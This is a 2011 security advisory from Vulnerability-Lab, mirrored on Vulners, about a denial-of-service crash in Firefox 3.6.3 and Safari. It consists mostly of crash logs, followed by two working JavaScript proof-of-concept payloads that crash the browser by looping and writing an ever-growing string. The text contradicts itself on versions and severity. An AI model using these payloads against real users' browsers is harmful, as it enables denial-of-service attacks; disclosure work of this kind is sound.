Vulners
Lucene search
Firefox 3.6.3 & Safari 4.0.5 - Denial of Service Vulnerability
🗓️ 16 Jun 2011 00:00:00Reported by Vulnerability-Lab [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabType 
vulnerlab🔗 www.vulnerability-lab.com👁 15 Views
Document Title:
===============
Firefox 3.6.3 & Safari 4.0.5 - Denial of Service Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=186
Release Date:
=============
2011-06-16
Vulnerability Laboratory ID (VL-ID):
====================================
186
Common Vulnerability Scoring System:
====================================
3
Product & Service Introduction:
===============================
Safari ist ein Browser, eine Plattform und eine offene Einladung, innovativ zu sein. Ob auf einem Mac, einem PC, einem iPhone oder einem iPod touch,
Safari überschreitet die Möglichkeiten des Internet und überzeugt durch erstklassigen Benutzerkomfort. Safari 4 ist in englischer Sprache verfügbar.
(Copy of the Vendor Homepage: http://www.apple.com)
Mit Sicherheit, Stabilität, Geschwindigkeit und vielem mehr ist Firefox wie geschaffen für Ihre Art und Weise, das Internet zu nutzen.
Mozilla Firefox ist einer der berühmtesten & meist genutzten Webbrowser im Internet.
(Copy of the Vendor Homepage: http://www.mozilla.com)
Abstract Advisory Information:
==============================
Vulnerability-Lab Team discovered a remote denial of service vulnerability on Safari v4.0.5 & Mozilla Forefox 3.6.3 browsers.
The remote denial of service vulnerability can lead to different unhandled appcrashs & .dll error exceptions.
Vulnerability Disclosure Timeline:
==================================
2011-06-18: Public Disclosure
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Low
Technical Details & Description:
================================
A denial of service vulnerability is detected on Safari 5.0.4. The vulnerability allows an attacker to form special
crafted links to crash the browser on the remote way. The problem is a string to char convert on the javascriptcore.dll
of the safari browser of apple. Victim need ot open a manipulated file via url request for exploitation. Works on Iphone,
IPad & the standard MacOS or iOS Systems with Browser.
Vulnerable Module(s):
[+] JavaScriptCore.dll
--- Exception & Error Logs ---
Version=1
EventType=APPCRASH
EventTime=129185239482901809
ReportType=2
Consent=1
UploadTime=129185239485841977
ReportIdentifier=b33c3844-613d-11df-ae0c-cc0b09ad14de
IntegratorReportIdentifier=b33c3843-613d-11df-ae0c-cc0b09ad14de
WOW64=1
Response.BucketId=1754424409
Response.BucketTable=1
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Safari.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=5.31.22.7
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=4b8f94fa
Sig[3].Name=Fehlermodulname
Sig[3].Value=JavaScriptCore.dll
Sig[4].Name=Fehlermodulversion
Sig[4].Value=5.31.22.5
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=4b8cb88c
Sig[6].Name=Ausnahmecode
Sig[6].Value=c0000005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=0008b267
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.1.7600.2.0.0.768.3
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusatzinformation 1
DynamicSig[22].Value=0a9e
DynamicSig[23].Name=Zusatzinformation 2
DynamicSig[23].Value=0a9e372d3b4ad19135b953a78882e789
DynamicSig[24].Name=Zusatzinformation 3
DynamicSig[24].Value=0a9e
DynamicSig[25].Name=Zusatzinformation 4
DynamicSig[25].Value=0a9e372d3b4ad19135b953a78882e789
UI[2]=C://Program Files (x86)//Safari//Safari.exe
UI[3]=Safari funktioniert nicht mehr
UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
UI[5]=Online nach einer Lösung suchen und das Programm schließen
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
UI[7]=Programm schließen
LoadedModule[0]=C://Program Files (x86)//Safari//Safari.exe
LoadedModule[1]=C://Windows//SysWOW64//ntdll.dll
LoadedModule[2]=C://Windows//syswow64//kernel32.dll
LoadedModule[3]=C://Windows//syswow64//KERNELBASE.dll
LoadedModule[4]=C://Windows//syswow64//SHLWAPI.dll
LoadedModule[5]=C://Windows//syswow64//GDI32.dll
LoadedModule[6]=C://Windows//syswow64//USER32.dll
LoadedModule[7]=C://Windows//syswow64//ADVAPI32.dll
LoadedModule[8]=C://Windows//syswow64//msvcrt.dll
LoadedModule[9]=C://Windows//SysWOW64//sechost.dll
LoadedModule[10]=C://Windows//syswow64//RPCRT4.dll
LoadedModule[11]=C://Windows//syswow64//SspiCli.dll
LoadedModule[12]=C://Windows//syswow64//CRYPTBASE.dll
LoadedModule[13]=C://Windows//syswow64//LPK.dll
LoadedModule[14]=C://Windows//syswow64//USP10.dll
LoadedModule[15]=C://Windows//WinSxS//x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4927_none_d08a205e442db5b5//MSVCR80.dll
LoadedModule[16]=C://Windows//system32//IMM32.DLL
LoadedModule[17]=C://Windows//syswow64//MSCTF.dll
LoadedModule[18]=C://Windows//syswow64//ole32.dll
LoadedModule[19]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//AppleVersions.dll
LoadedModule[20]=C://Windows//system32//VERSION.dll
LoadedModule[21]=C://Program Files (x86)//Safari//Safari.dll
LoadedModule[22]=C://Windows//syswow64//SHELL32.dll
LoadedModule[23]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//CoreFoundation.dll
LoadedModule[24]=C://Windows//syswow64//WS2_32.dll
LoadedModule[25]=C://Windows//syswow64//NSI.dll
LoadedModule[26]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//pthreadVC2.dll
LoadedModule[27]=C://Windows//system32//WSOCK32.dll
LoadedModule[28]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//objc.dll
LoadedModule[29]=C://Windows//WinSxS//x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4927_none_d08a205e442db5b5//MSVCP80.dll
LoadedModule[30]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//icuin40.dll
LoadedModule[31]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//icuuc40.dll
LoadedModule[32]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//icudt40.dll
LoadedModule[33]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//ASL.dll
LoadedModule[34]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//JavaScriptCore.dll
LoadedModule[35]=C://Windows//syswow64//OLEAUT32.dll
LoadedModule[36]=C://Windows//system32//WINMM.dll
LoadedModule[37]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//CFNetwork.dll
LoadedModule[38]=C://Windows//syswow64//CRYPT32.dll
LoadedModule[39]=C://Windows//syswow64//MSASN1.dll
LoadedModule[40]=C://Windows//syswow64//WININET.dll
LoadedModule[41]=C://Windows//syswow64//Normaliz.dll
LoadedModule[42]=C://Windows//syswow64//urlmon.dll
LoadedModule[43]=C://Windows//syswow64//iertutil.dll
LoadedModule[44]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//SQLite3.dll
LoadedModule[45]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//zlib1.dll
LoadedModule[46]=C://Windows//system32//iphlpapi.dll
LoadedModule[47]=C://Windows//system32//WINNSI.DLL
LoadedModule[48]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//CoreGraphics.dll
LoadedModule[49]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//WebKit.dll
LoadedModule[50]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//libxml2.dll
LoadedModule[51]=C://Program Files (x86)//Safari//SafariTheme.dll
LoadedModule[52]=C://Windows//system32//UxTheme.dll
LoadedModule[53]=C://Windows//WinSxS//x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc//COMCTL32.dll
LoadedModule[54]=C://Program Files (x86)//Common Files//microsoft shared//ink//tiptsf.dll
LoadedModule[55]=C://Windows//system32//profapi.dll
LoadedModule[56]=C://Windows//system32//dwmapi.dll
LoadedModule[57]=C://Windows//syswow64//CLBCatQ.DLL
LoadedModule[58]=C://Windows//system32//WindowsCodecs.dll
LoadedModule[59]=C://Windows//system32//apphelp.dll
LoadedModule[60]=C://Windows//system32//EhStorShell.dll
LoadedModule[61]=C://Windows//syswow64//SETUPAPI.dll
LoadedModule[62]=C://Windows//syswow64//CFGMGR32.dll
LoadedModule[63]=C://Windows//syswow64//DEVOBJ.dll
LoadedModule[64]=C://Windows//system32//PROPSYS.dll
LoadedModule[65]=C://Windows//system32//ntshrui.dll
LoadedModule[66]=C://Windows//system32//srvcli.dll
LoadedModule[67]=C://Windows//system32//cscapi.dll
LoadedModule[68]=C://Windows//system32//slc.dll
LoadedModule[69]=C://Windows//system32//WINSPOOL.DRV
LoadedModule[70]=C://Windows//system32//d3d9.dll
LoadedModule[71]=C://Windows//system32//d3d8thk.dll
LoadedModule[72]=C://Windows//system32//atiumdag.dll
LoadedModule[73]=C://Windows//system32//atiumdva.dll
LoadedModule[74]=C://Windows//system32//mscms.dll
LoadedModule[75]=C://Windows//system32//USERENV.dll
LoadedModule[76]=C://Windows//System32//msxml6.dll
LoadedModule[77]=C://Windows//system32//Cryptdll.dll
LoadedModule[78]=C://Windows//system32//dhcpcsvc6.DLL
LoadedModule[79]=C://Windows//system32//dhcpcsvc.DLL
LoadedModule[80]=C://Windows//system32//oleacc.dll
LoadedModule[81]=C://Windows//system32//CRYPTSP.dll
LoadedModule[82]=C://Windows//system32//rsaenh.dll
LoadedModule[83]=C://Windows//system32//RpcRtRemote.dll
LoadedModule[84]=C://Windows//system32//SXS.DLL
LoadedModule[85]=C://Windows//system32//explorerframe.dll
LoadedModule[86]=C://Windows//system32//DUser.dll
LoadedModule[87]=C://Windows//system32//DUI70.dll
LoadedModule[88]=C://Windows//system32//MSIMG32.dll
LoadedModule[89]=C://Program Files (x86)//Safari//PubSubDLL.dll
LoadedModule[90]=C://Program Files (x86)//Common Files//Apple//Apple Application Support//libtidy.dll
LoadedModule[91]=C://Windows//system32//dnsapi.DLL
LoadedModule[92]=C://Windows//System32//netprofm.dll
LoadedModule[93]=C://Windows//System32//nlaapi.dll
LoadedModule[94]=C://Windows//System32//npmproxy.dll
LoadedModule[95]=C://Windows//system32//mswsock.dll
LoadedModule[96]=C://Windows//System32//wship6.dll
LoadedModule[97]=C://Windows//System32//wshtcpip.dll
LoadedModule[98]=C://Windows//system32//rasadhlp.dll
LoadedModule[99]=C://Windows//System32//fwpuclnt.dll
LoadedModule[100]=C://Program Files (x86)//Safari//Search.dll
State[0].Key=Transport.DoneStage1
State[0].Value=1
FriendlyEventName=Nicht mehr funktionsfähig
ConsentKey=APPCRASH
AppName=Safari
AppPath=C://Program Files (x86)//Safari//Safari.exe
Pictures:
../Safari.png
After testing with Safari i tried the older Firefox versions ... and works ...
but not as stable corruption ... just as application hang crash whats not really important.
--- Crash Signature ---
Add-ons: {972ce4c6-7e08-4474-a285-3208198ce6fd}:3.6.3
BuildID: 20100401080539
CrashTime: 1274047373
EMCheckCompatibility: true
FramePoisonBase: 00000000f0de0000
FramePoisonSize: 65536
InstallTime: 1274047353
ProductName: Firefox
ReleaseChannel: release
StartupTime: 1274047353
Theme: classic/1.0
Throttleable: 1
Vendor: Mozilla
Version: 3.6.3
Diese Meldung enthält Informationen über den Status der Anwendung zum Zeitpunkt des Absturzes.
Add-ons: {CAFEEFAC-0016-0000-0010-ABCDEFFEDCBA}:6.0.10,[email protected]:0.4.5,{e0204bd5-9d31-402b-a99d-a6aa8ffebdca}:1.2.5,[email protected]:2.2.0,[email protected]:0.4.4,{9c51bd27-6ed8-4000-a2bf-36cb95c0c947}:11.0.1,{078fac48-925f-4524-7cfe-85d44b8f4f98}:1.2,{972ce4c6-7e08-4474-a285-3208198ce6fd}:3.6.3
BuildID: 20100401080539
CrashTime: 1274048978
EMCheckCompatibility: true
FramePoisonBase: 00000000f0de0000
FramePoisonSize: 65536
InstallTime: 1271001297
ProductName: Firefox
ReleaseChannel: release
SecondsSinceLastCrash: 18961191
StartupTime: 1274048839
Theme: classic/1.0
Throttleable: 1
URL: file:///C:/Users/Pim%20Campers/Desktop/exploit.html
Vendor: Mozilla
Version: 3.6.3
This report also contains technical information about the state of the application when it crashed.
--- Debug Logs ---
Version=1
EventType=AppHangB1
EventTime=129185060262769200
ReportType=3
Consent=1
UploadTime=129185060287489643
ReportIdentifier=f8d5f75c-6113-11df-aeb8-f058f4e2ccda
IntegratorReportIdentifier=f8d5f75d-6113-11df-aeb8-f058f4e2ccda
WOW64=1
Response.BucketId=1079492713
Response.BucketTable=5
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=firefox.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=1.9.2.3743
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=4bb4be02
Sig[3].Name=Absturzsignatur
Sig[3].Value=d496
Sig[4].Name=Absturztyp
Sig[4].Value=0
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.1.7600.2.0.0.768.3
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusätzliche Absturzsignatur 1
DynamicSig[22].Value=d496cf6633958b1ae4d8334c2f20f6a8
DynamicSig[23].Name=Zusätzliche Absturzsignatur 2
DynamicSig[23].Value=640f
DynamicSig[24].Name=Zusätzliche Absturzsignatur 3
DynamicSig[24].Value=640fd84d363223b27e9ec50b94061313
DynamicSig[25].Name=Zusätzliche Absturzsignatur 4
DynamicSig[25].Value=d496
DynamicSig[26].Name=Zusätzliche Absturzsignatur 5
DynamicSig[26].Value=d496cf6633958b1ae4d8334c2f20f6a8
DynamicSig[27].Name=Zusätzliche Absturzsignatur 6
DynamicSig[27].Value=640f
DynamicSig[28].Name=Zusätzliche Absturzsignatur 7
DynamicSig[28].Value=640fd84d363223b27e9ec50b94061313
UI[3]=Firefox reagiert nicht
UI[4]=Wenn Sie das Programm schließen, gehen möglicherweise Informationen verloren.
UI[5]=Programm schließen
UI[6]=Programm schließen
UI[7]=Programm schließen
LoadedModule[0]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//firefox.exe
LoadedModule[1]=C://Windows//SysWOW64//ntdll.dll
LoadedModule[2]=C://Windows//syswow64//kernel32.dll
LoadedModule[3]=C://Windows//syswow64//KERNELBASE.dll
LoadedModule[4]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//xul.dll
LoadedModule[5]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//sqlite3.dll
LoadedModule[6]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//MOZCRT19.dll
LoadedModule[7]=C://Windows//syswow64//msvcrt.dll
LoadedModule[8]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//js3250.dll
LoadedModule[9]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//nspr4.dll
LoadedModule[10]=C://Windows//syswow64//ADVAPI32.dll
LoadedModule[11]=C://Windows//SysWOW64//sechost.dll
LoadedModule[12]=C://Windows//syswow64//RPCRT4.dll
LoadedModule[13]=C://Windows//syswow64//SspiCli.dll
LoadedModule[14]=C://Windows//syswow64//CRYPTBASE.dll
LoadedModule[15]=C://Windows//system32//WSOCK32.dll
LoadedModule[16]=C://Windows//syswow64//WS2_32.dll
LoadedModule[17]=C://Windows//syswow64//NSI.dll
LoadedModule[18]=C://Windows//system32//WINMM.dll
LoadedModule[19]=C://Windows//syswow64//USER32.dll
LoadedModule[20]=C://Windows//syswow64//GDI32.dll
LoadedModule[21]=C://Windows//syswow64//LPK.dll
LoadedModule[22]=C://Windows//syswow64//USP10.dll
LoadedModule[23]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//smime3.dll
LoadedModule[24]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//nss3.dll
LoadedModule[25]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//nssutil3.dll
LoadedModule[26]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//plc4.dll
LoadedModule[27]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//plds4.dll
LoadedModule[28]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//ssl3.dll
LoadedModule[29]=C://Windows//syswow64//SHELL32.dll
LoadedModule[30]=C://Windows//syswow64//SHLWAPI.dll
LoadedModule[31]=C://Windows//syswow64//ole32.dll
LoadedModule[32]=C://Windows//system32//VERSION.dll
LoadedModule[33]=C://Windows//system32//WINSPOOL.DRV
LoadedModule[34]=C://Windows//syswow64//COMDLG32.dll
LoadedModule[35]=C://Windows//WinSxS//x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc//COMCTL32.dll
LoadedModule[36]=C://Windows//syswow64//IMM32.dll
LoadedModule[37]=C://Windows//syswow64//MSCTF.dll
LoadedModule[38]=C://Windows//system32//MSIMG32.dll
LoadedModule[39]=C://Windows//syswow64//OLEAUT32.dll
LoadedModule[40]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//xpcom.dll
LoadedModule[41]=C://Windows//system32//uxtheme.dll
LoadedModule[42]=C://Windows//system32//dwmapi.dll
LoadedModule[43]=C://Windows//system32//dbghelp.dll
LoadedModule[44]=C://Program Files (x86)//Common Files//microsoft shared//ink//tiptsf.dll
LoadedModule[45]=C://Windows//syswow64//SETUPAPI.dll
LoadedModule[46]=C://Windows//syswow64//CFGMGR32.dll
LoadedModule[47]=C://Windows//syswow64//DEVOBJ.dll
LoadedModule[48]=C://Windows//syswow64//CLBCatQ.DLL
LoadedModule[49]=C://Windows//system32//propsys.dll
LoadedModule[50]=C://Windows//system32//ntmarta.dll
LoadedModule[51]=C://Windows//syswow64//WLDAP32.dll
LoadedModule[52]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//components//browserdirprovider.dll
LoadedModule[53]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//components//brwsrcmp.dll
LoadedModule[54]=C://Windows//system32//mswsock.dll
LoadedModule[55]=C://Windows//System32//wshtcpip.dll
LoadedModule[56]=C://Windows//system32//iphlpapi.dll
LoadedModule[57]=C://Windows//system32//WINNSI.DLL
LoadedModule[58]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//Data//profile//extensions//{3b56bcc7-54e5-44a2-9b44-66c3ef58c13e}//components//nstidy.dll
LoadedModule[59]=C://Windows//System32//wship6.dll
LoadedModule[60]=C://Windows//system32//t2embed.dll
LoadedModule[61]=C://Windows//system32//shdocvw.dll
LoadedModule[62]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//softokn3.dll
LoadedModule[63]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//nssdbm3.dll
LoadedModule[64]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//freebl3.dll
LoadedModule[65]=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//firefox//nssckbi.dll
LoadedModule[66]=C://Windows//system32//NLAapi.dll
LoadedModule[67]=C://Windows//system32//DNSAPI.dll
LoadedModule[68]=C://Windows//System32//winrnr.dll
LoadedModule[69]=C://Windows//system32//napinsp.dll
LoadedModule[70]=C://Windows//system32//pnrpnsp.dll
LoadedModule[71]=C://Windows//system32//WindowsCodecs.dll
LoadedModule[72]=C://Windows//system32//apphelp.dll
LoadedModule[73]=C://Windows//system32//EhStorShell.dll
LoadedModule[74]=C://Windows//system32//ntshrui.dll
LoadedModule[75]=C://Windows//system32//srvcli.dll
LoadedModule[76]=C://Windows//system32//cscapi.dll
LoadedModule[77]=C://Windows//system32//slc.dll
LoadedModule[78]=C://Windows//system32//CRYPTSP.dll
LoadedModule[79]=C://Windows//system32//rsaenh.dll
LoadedModule[80]=C://Windows//system32//RpcRtRemote.dll
LoadedModule[81]=C://Windows//system32//profapi.dll
LoadedModule[82]=C://Windows//system32//mscms.dll
LoadedModule[83]=C://Windows//system32//USERENV.dll
LoadedModule[84]=C://Windows//System32//msxml6.dll
LoadedModule[85]=C://Windows//system32//rasadhlp.dll
LoadedModule[86]=C://Windows//system32//oleacc.dll
LoadedModule[87]=C://Windows//system32//SXS.DLL
LoadedModule[88]=C://Windows//system32//explorerframe.dll
LoadedModule[89]=C://Windows//system32//DUser.dll
LoadedModule[90]=C://Windows//system32//DUI70.dll
LoadedModule[91]=C://Windows//System32//fwpuclnt.dll
LoadedModule[92]=C://Windows//system32//Macromed//Flash//NPSWF32.dll
LoadedModule[93]=C://Windows//syswow64//WININET.dll
LoadedModule[94]=C://Windows//syswow64//Normaliz.dll
LoadedModule[95]=C://Windows//syswow64//urlmon.dll
LoadedModule[96]=C://Windows//syswow64//CRYPT32.dll
LoadedModule[97]=C://Windows//syswow64//MSASN1.dll
LoadedModule[98]=C://Windows//syswow64//iertutil.dll
LoadedModule[99]=C://Windows//system32//mlang.dll
LoadedModule[100]=C://Windows//system32//MMDevAPI.DLL
LoadedModule[101]=C://Windows//system32//wdmaud.drv
LoadedModule[102]=C://Windows//system32//ksuser.dll
LoadedModule[103]=C://Windows//system32//AVRT.dll
LoadedModule[104]=C://Windows//system32//AUDIOSES.DLL
LoadedModule[105]=C://Windows//system32//msacm32.drv
LoadedModule[106]=C://Windows//system32//MSACM32.dll
LoadedModule[107]=C://Windows//system32//midimap.dll
LoadedModule[108]=C://Windows//system32//Secur32.dll
LoadedModule[109]=C://Windows//system32//credssp.dll
LoadedModule[110]=C://Windows//SysWOW64//schannel.dll
LoadedModule[111]=C://Windows//system32//msls31.dll
LoadedModule[112]=C://Windows//system32//xmllite.dll
LoadedModule[113]=C://Windows//system32//UIAutomationCore.dll
LoadedModule[114]=C://Windows//syswow64//PSAPI.DLL
LoadedModule[115]=C://Windows//System32//StructuredQuery.dll
LoadedModule[116]=C://Windows//SysWOW64//actxprxy.dll
LoadedModule[117]=C://Program Files (x86)//Internet Explorer//ieproxy.dll
LoadedModule[118]=C://Windows//SysWOW64//thumbcache.dll
LoadedModule[119]=C://Windows//system32//ieframe.DLL
LoadedModule[120]=C://Windows//system32//SearchFolder.dll
LoadedModule[121]=C://Windows//system32//NetworkExplorer.dll
LoadedModule[122]=C://Windows//system32//LINKINFO.dll
LoadedModule[123]=C://Windows//system32//MPR.dll
LoadedModule[124]=C://Windows//System32//drprov.dll
LoadedModule[125]=C://Windows//System32//WINSTA.dll
LoadedModule[126]=C://Windows//System32//ntlanman.dll
LoadedModule[127]=C://Windows//System32//davclnt.dll
LoadedModule[128]=C://Windows//System32//DAVHLPR.dll
LoadedModule[129]=C://Windows//system32//wkscli.dll
LoadedModule[130]=C://Windows//system32//netutils.dll
LoadedModule[131]=C://Windows//system32//PortableDeviceApi.dll
LoadedModule[132]=C://Windows//system32//samcli.dll
LoadedModule[133]=C://Windows//system32//SAMLIB.dll
LoadedModule[134]=C://Windows//syswow64//WINTRUST.dll
LoadedModule[135]=C://Windows//system32//EhStorAPI.dll
LoadedModule[136]=C://Windows//system32//RASAPI32.dll
LoadedModule[137]=C://Windows//system32//rasman.dll
LoadedModule[138]=C://Windows//system32//rtutils.dll
LoadedModule[139]=C://Windows//system32//sensapi.dll
LoadedModule[140]=C://Windows//System32//Wpc.dll
LoadedModule[141]=C://Windows//System32//wevtapi.dll
LoadedModule[142]=C://Program Files (x86)//Windows Defender//MpOav.dll
State[0].Key=Transport.DoneStage1
State[0].Value=1
FriendlyEventName=Beendet und geschlossen.
ConsentKey=AppHangXProcB1
AppName=Firefox
AppPath=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//Firefox//firefox.exe
ReportDescription=Aufgrund eines Problems kann dieses Programm nicht mehr mit Windows kommunizieren.
Pictures:
../mf-portable1.png
../mf-portable2.png
../mf-stable-3.6.3-1.png
Proof of Concept (PoC):
=======================
This vulnerabilities can be exploited by remote attackers with user inter action. For demonstration or reproduce ...
<script language=JavaScript>m='%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3B%20URL%3Dpoc.html%22%3E%0A%3Cscript%3E%0A
%20%20var%20AAAAAAAAAAAAAAAA%3DString.fromCharCode%2860%2C%20115%2C%2099%2C%20114%2C%20105%2C%20112%2C%20116%2C%2062%2C%20118%2C%2097
%2C%20114%2C%2032%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2
0%0A65%2C%2065%2C%2061%2C%2034%2C%2060%2C%20107%2C%20101%2C%20121%2C%20103%2C%20101%2C%20110%2C%2062%2C%2065%2C%2065%2C%2065%2C%2065%
2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2034%2C%2059%2C%20119%2C%20104%2C%2
0105%2C%20108%2C%20101%2C%2040%2C%20%0A49%2C%2041%2C%20123%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%
2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2061%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C
%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2043%2C%2065%2C%2065%2C%20%0A65%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%20
65%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2059%2C%20100%2C%20111%2C%2099%2C%20117%2C%20109%2C%20101%2C%20110%2C%20
116%2C%2046%2C%20119%2C%20114%2C%20105%2C%20116%2C%20101%2C%20108%2C%20110%2C%2040%2C%2065%2C%2065%2C%2065%2C%2065%2C%20%0A65%2C%2065
%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2065%2C%2041%2C%2059%2C%20125%2C%2060%2C%2047%2C%20115%2C%
2099%2C%20114%2C%20105%2C%20112%2C%20116%2C%2062%29%3B%0A%20%20while%281%29%7B%0A%20%20%20%20AAAAAAAAAAAAAAAA%3DAAAAAAAAAAAAAAAA+AA
AAAAAAAAAAAAAA%3B%0A%20%20%20%20document.writeln%28AAAAAAAAAAAAAAAA%29%3B';d=unescape(m);document.write(d);</script>
or ...
<meta http-equiv="refresh" content="0; URL=poc.html">
<script>
var AAAAAAAAAAAAAAAA=String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 118, 97, 114, 32, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 61, 34, 60, 107, 101, 121, 103, 101, 110, 62, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 34, 59, 119, 104, 105, 108, 101, 40,
49, 41, 123, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 61, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 43, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 108, 110, 40, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 41, 59, 125, 60, 47, 115, 99, 114, 105, 112, 116, 62);
while(1){
AAAAAAAAAAAAAAAA=AAAAAAAAAAAAAAAA+AAAAAAAAAAAAAAAA;
document.writeln(AAAAAAAAAAAAAAAA);
}
</script>
Security Risk:
==============
The security risk of the memory corruption vulnerability is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: [email protected] - [email protected] - [email protected]
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.
Copyright © 2012 | Vulnerability Laboratory
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
